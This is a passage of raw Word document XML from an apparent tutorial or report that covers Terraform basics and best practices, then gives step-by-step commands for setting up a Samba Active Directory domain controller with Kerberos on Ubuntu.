    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EB">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_iks2gn1kkc8w" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7.3 Initializing and Applying Terraform</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000E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Initialize your environment with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">terraform init</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to download required plugins. Before applying changes, use </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">terraform plan</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> to preview what Terraform will do. Apply the changes with </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">terraform apply.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000ED">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.7.4 Best Practices</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EE">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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modules to reuse code and manage complexity.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000EF">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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 Terraform files in version control systems like Git.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F0">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>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Secure the state file, especially if it contains sensitive information.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F1">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>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b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.8 Challenges and Considerations</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F2">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Terraform offers many benefits, there are also challenges and considerations to keep in mind:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F3">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:before="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">State Management Issues:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> The state file is critical to Terraform's operation, as it tracks the current state of the infrastructure. Managing this file securely is essential, as it contains sensitive information. Additionally, the state file must be kept in sync with the actual infrastructure to prevent drift.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_gjdgxs" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Complexity in Large Environments:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Managing very large environments with Terraform can become complex, especially when dealing with hundreds or thousands of resources. Careful planning and modularization are required to manage complexity and ensure that configurations remain maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F5">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15"/>
        </w:numPr>
        <w:spacing w:after="280" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Learning Curve:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> For teams new to infrastructure as code, Terraform's learning curve can be steep. Understanding the nuances of Terraform's configuration language, state management, and provider interactions is essential for successful adoption.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F6">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_3oe85wkujnr9" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.9 Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F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Terraform plays a pivotal role in modern infrastructure management, enabling teams to automate the provisioning and management of cloud resources. Its declarative approach, multi-cloud support, and powerful features make it a valuable tool for organizations looking to scale and optimize their infrastructure. However, challenges such as state management and complexity in large environments must be carefully managed to ensure successful implementation.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F8">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1.10 Active Directory Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000F9">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deploying your infrastructure using Terraform, setting up Active Directory (AD) is crucial for managing users and resources within your environment. Below are the steps to add Active Directory on an Ubuntu server.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FA">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:keepNext w:val="0"/>
        <w:keepLines w:val="0"/>
        <w:spacing w:before="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_mv1y0s8ylfr6" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:i w:val="0"/>
          <w:color w:val="000000"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">1.10.1 Active Directory Setup</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FB">
      <w:pPr>
        <w:spacing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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 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Configure Hostname</w:t>
        <w:br w:type="textWrapp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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostnamectl hostname dc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FC">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clea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2</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Check the hostname and the IP address of your Ubuntu server</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">             Use these commands to check the hostname and IP address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000FD">
      <w:pPr>
        <w:spacing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tl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">hostnamectl</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">               ip a s</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5943600" cy="4329113"/>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432911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3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="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3: Map the IP address with the hostname</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo nano etc/hosts</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127.0.1.1 Ubuntu.myguest.virtualbox.org Ubuntu</w:t>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10.0.2.15(IP address of the system) dc dc.pd.com</w:t>
      </w:r>
    </w:p>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943600" cy="3556000"/>
            <wp:effectExtent b="0" l="0" r="0" t="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3.3: ping –c 1 dc.pd.com</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000001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943600" cy="2762250"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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6"/>
          <w:szCs w:val="26"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3.4:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> sudo reboot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000109">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 4: Disable the system’s DNS resolver service</w:t>
        <w:br w:type="textWrapping"/>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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> systemctl status systemd-resolved.service</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                systemctl stop systemd-resolved.service</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                systemctl disable systemd-resolved.service</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                systemctl status systemd-resolved.service</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010A">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 5: Force the AD controller as the system’s DNS resolver</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">             Edit the etc/resolv.conf file and use the server IP as nameserver </w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">             Save the configuration to force the AD controller as the system’s DNS resolver.</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                sudo nano /etc/resolv.conf</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010B">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clea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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Note: Enter domain name and IP address of your system (either pd.com or any other)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010C">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943600" cy="2806382"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr id="1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2806382"/>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3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:rPr/>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:b w:val="1"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 6: Check the system clock in synchronized</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">                timedatectl</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010E">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="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4"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 7: Install samba</w:t>
        <w:br w:type="textWrapping"/>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00"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo apt-get update</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                sudo apt install samba smbclient</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                sudo apt install winbind(if not already installed) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000010F">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="24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rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 8: Provision Samba AD</w:t>
        <w:br w:type="textWrapp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2"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">   whereis samba</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                sudo mv /etc/samba/smb.conf /etc/samba/smb.conf.bk</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">                sudo samba-tool domain provision --use-rfc2307 –interactive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000110">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clea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9: Install Kerberos</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">             Kerberos is a network authentication system based on the principle of a trusted     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000111">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clea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third party. Let’s install it:                                  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000112">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="0" w:before="0" w:lineRule="auto"/>
        <w:ind w:left="850.393700787401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 part of the Kerberos installation, you may need to configure the realm,   Kerberos server, Kerberos administrative server, and configurations. And take the backup of the Kerberos configuration and replace it with the one generated by the Samba provisioning process.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000113">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="24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sudo apt install krb5-admin-server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000114">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clea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Enter PD.com or others you have created in step 3.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000115">
      <w:pPr>
        <w:shd w:fill="ffffff" w:val="clear"/>
        <w:spacing w:after="240" w:before="24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br w:type="textWrapping"/>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo mv /etc/krb5.conf /etc/krb5.conf.orig</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve">  sudo cp /var/lib/samba/private/krb5.conf /etc/krb5.conf</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123825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>19050</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5943600" cy="2988837"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="0" dist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988837"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect"/>
                    <a:ln/>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000116">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clea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10: Disable and mask unused samba services</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">              In order to run the domain controller, you’ll have to disable sbmd, nmbd and    </w:t>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winbind.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000118">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sudo systemctl mask smbd nmbd winbind</w:t>
        <w:br w:type="textWrapping"/>
        <w:t xml:space="preserve"> sudo systemctl disable smbd nmbd winbind</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000119">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:fill="ffffff" w:val="clea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11: Start the samba-ad-dc service</w:t>
        <w:br w:type="textWrapping"/>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
